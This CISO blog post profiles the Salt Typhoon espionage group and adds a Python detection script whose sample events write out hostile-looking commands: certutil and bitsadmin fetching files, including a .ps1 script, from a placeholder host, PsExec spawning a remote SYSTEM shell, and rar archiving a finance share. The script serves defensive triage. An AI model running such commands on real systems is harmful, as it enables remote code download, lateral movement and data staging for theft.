CISO Blog

Salt Typhoon, an advanced persistent threat

Sun Tzu made the statement “If you know the enemy and know yourself, you need not fear the result of a hundred battles.”

This highlights the significance of knowledge and strategy in overcoming adversaries. The more you know about your opponent, the better equipped you are to achieve victory.

So, to help you achieve that goal, here is some research on Salt Typhoon.

Salt Typhoon, an advanced persistent threat (APT) group, is a Chinese state-sponsored entity known for its cyber espionage activities and strategic operations aiming to disrupt critical infrastructures. Active since at least 2019, Salt Typhoon, also referred to as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, has been linked to China’s Ministry of State Security (MSS). This affiliation provides them with significant resources, protection, and strategic direction.

Targets and Objectives

Salt Typhoon primarily targets telecommunications companies, government bodies, and technology firms to gather crucial intelligence and exert strategic influence. Their operations span globally, focusing on regions such as North America, Southeast Asia, and Africa. Key targets include:

  • Telecommunications Providers: Collecting call metadata, intercepting communications, and tracing target movements.
  • Hotels: Tracking locations and movements of significant individuals.
  • Government Agencies: Extracting sensitive information for intelligence purposes.
  • Internet Service Providers (ISPs): Compromising systems managing court-authorized wiretaps.

Additional targets include military institutions, solar energy companies, financial bodies, NGOs, engineering firms, and law practices, reflecting a broad interest in sectors holding strategic or sensitive data.

Tactics, Techniques, and Procedures (TTPs)

Salt Typhoon employs a range of sophisticated tactics to infiltrate and exploit targeted networks:

  • Exploiting Vulnerabilities: Using both known and zero-day vulnerabilities in public-facing systems to gain access. Notable exploits include ProxyLogon (CVE-2021-26855) and various vulnerabilities in VPN configurations.
  • “Living off the Land” Techniques: Employing legitimate tools like PowerShell for stealthy operations, including reconnaissance and data exfiltration.
  • Custom Malware: Deploying bespoke malware such as SparrowDoor, GhostSpider, and the Demodex rootkit to maintain persistence and evade detection.
  • DLL Search-order Hijacking: Used to covertly deploy backdoors like SparrowDoor.
  • Lateral Movement: Utilizing tools such as PsExec and WinRAR for network navigation and data compression; deploying Certutil and BITSAdmin for downloading malicious scripts.
  • Credential Harvesting: Employing tools like Mimikat_ssp and new NinjaCopy variants for credential extraction and file exfiltration.
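Several of the tools listed above (Certutil, BITSAdmin, PsExec, WinRAR) are legitimate administration utilities, so detection depends on how they are invoked and whether they appear together on one host. The following is an added example, not part of the original post: a small triage script over constructed process-creation events, where the field names (`host`, `Image`, `CommandLine`), the hostnames, and the `example.invalid` URLs are assumptions made for illustration.

```python
import json
import re

# Rules keyed to tools named in the list above: (label, image regex, command-line regex).
RULES = [
    ("certutil-download", r"\\certutil\.exe$", r"[-/]urlcache\b.*https?://"),
    ("bitsadmin-download", r"\\bitsadmin\.exe$", r"/(transfer|addfile)\b.*https?://"),
    ("psexec-remote", r"\\psexec(64)?\.exe$", r"\s\\\\[\w.-]+"),
    ("rar-archive-create", r"\\(rar|winrar)\.exe$", r"\sa\s"),
]
COMPILED = [(n, re.compile(i, re.I), re.compile(c, re.I)) for n, i, c in RULES]

# Constructed sample events (JSON lines); the last one is benign certutil use.
SAMPLE = r'''
{"host":"WEB01","Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -urlcache -split -f http://files.example.invalid/a.txt C:\\ProgramData\\a.txt"}
{"host":"WEB01","Image":"C:\\Windows\\System32\\bitsadmin.exe","CommandLine":"bitsadmin.exe /transfer job1 http://files.example.invalid/b.ps1 C:\\ProgramData\\b.ps1"}
{"host":"WEB01","Image":"C:\\Tools\\PsExec.exe","CommandLine":"PsExec.exe \\\\FS01 -s cmd.exe"}
{"host":"FS01","Image":"C:\\Program Files\\WinRAR\\rar.exe","CommandLine":"rar.exe a C:\\ProgramData\\out.rar C:\\Shares\\Finance"}
{"host":"HR07","Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -hashfile C:\\Temp\\setup.exe SHA256"}
'''

def match_rules(event):
    """Return labels of every rule whose image and command-line patterns both match."""
    return [name for name, img, cmd in COMPILED
            if img.search(event["Image"]) and cmd.search(event["CommandLine"])]

def triage(lines):
    """Group hits per host; two or more distinct techniques on one host rates 'high'."""
    hits = {}
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        for label in match_rules(event):
            hits.setdefault(event["host"], set()).add(label)
    return {host: ("high" if len(labels) >= 2 else "review", sorted(labels))
            for host, labels in hits.items()}

if __name__ == "__main__":
    for host, (priority, labels) in triage(SAMPLE.splitlines()).items():
        print(host, priority, labels)
```

A single hit is left at "review" because each tool has routine administrative uses; the per-host grouping is what separates a download followed by remote execution from ordinary activity.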

Notable Campaigns

Salt Typhoon’s operations have included high-impact campaigns:

  • ProxyLogon Exploitation (2021): A swift exploitation of Microsoft Exchange server vulnerabilities following patch releases.
  • Telecom Breaches (2024): Major breaches of US telecom giants like AT&T and Verizon, compromising sensitive communications data.
  • ISP Infiltration: Accessing sensitive ISP data, including information from legal wiretaps.
  • Political Targeting: Attempts to compromise phones of high-profile US political figures, indicating ambitions to influence political processes.

Government and Industry Responses

In response to Salt Typhoon’s aggression, various measures have been implemented:

  • Cyber Unified Coordination Group: A US initiative to mitigate breaches and investigate security lapses.
  • Guidance Issuance: Recommendations for telecom sectors to detect, address vulnerabilities, and enhance cybersecurity.
  • China Telecom Ban: A move to limit possible espionage activities.
  • Enhanced Cybersecurity Measures: Promotion of zero-trust architecture, continuous monitoring, and collaboration between private and public entities.

Security agencies like CISA, NSA, and the FBI have also provided guidelines to strengthen defenses against such threats, emphasizing robust authentication processes and secure communications.

Impact and Implications

Salt Typhoon’s espionage activities have significant ramifications:

  • Threatening Privacy and Security: Theft of communications records undermines privacy and security protocols.
  • Jeopardizing Law Enforcement: Breach of wiretap systems hampers law enforcement capabilities.
  • Critical Infrastructure Exposure: Endangers sectors crucial to national security and economic stability, highlighting vulnerabilities to external threats.
  • Political Process Influence: Attempts to compromise political figures imply a strategic approach to destabilize confidence in cybersecurity governance.

Defense Strategies

Organizations are advised to adopt comprehensive defense strategies to counteract Salt Typhoon:

  • Network Segmentation and Monitoring: Ensuring critical systems are isolated and network activity is consistently monitored.
  • Regular Patch Management: Keeping up-to-date with security patches to close vulnerability exploitation windows.
  • Zero Trust Architecture: Implementing strict access control, communication encryption, and principle of least privilege.
  • Threat Intelligence Utilization: Leveraging threat intelligence data to preemptively guard against known TTPs.
  • Secure by Design Principles: Encouraging integration of security measures throughout software development.

Salt Typhoon represents a significant cyber threat, equipped with sophisticated techniques and far-reaching strategic objectives. Their focus on espionage and infrastructure disruption urges a fortified global cybersecurity stance: continuous vigilance, strengthened cybersecurity protocols, and collaboration between public and private sectors.
